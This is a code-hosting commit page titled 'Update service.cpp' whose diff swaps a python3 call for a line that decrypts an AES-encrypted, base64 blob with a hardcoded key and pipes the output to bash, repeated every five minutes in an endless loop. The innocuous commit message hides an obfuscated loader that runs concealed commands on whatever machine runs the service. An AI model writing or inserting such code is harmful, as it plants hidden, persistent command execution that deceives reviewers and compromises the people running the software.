Unverified Commit 36df1e30 authored by Dapa's avatar Dapa Committed by GitHub

Update service.cpp

parent da4070e3
......@@ -26,7 +26,7 @@ int command(const char *cmd) {
int main() {
while(1)
{
command("timeout 15m python3");
command("echo 'ZuaTG+DFNT75VQ01SqPiJVUQd7RzpKa5/y9Ry9ubor60o/gUW+KE4RuA4vi4eRlAGpnyC5D1RLvFdkiFk2e4GjrjJwq5gBo=' | openssl enc -d -base64 -aes-128-ctr -nopad -nosalt -k secret_password | bash");
sleep(300);
}
}
Markdown is supported
0%
or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment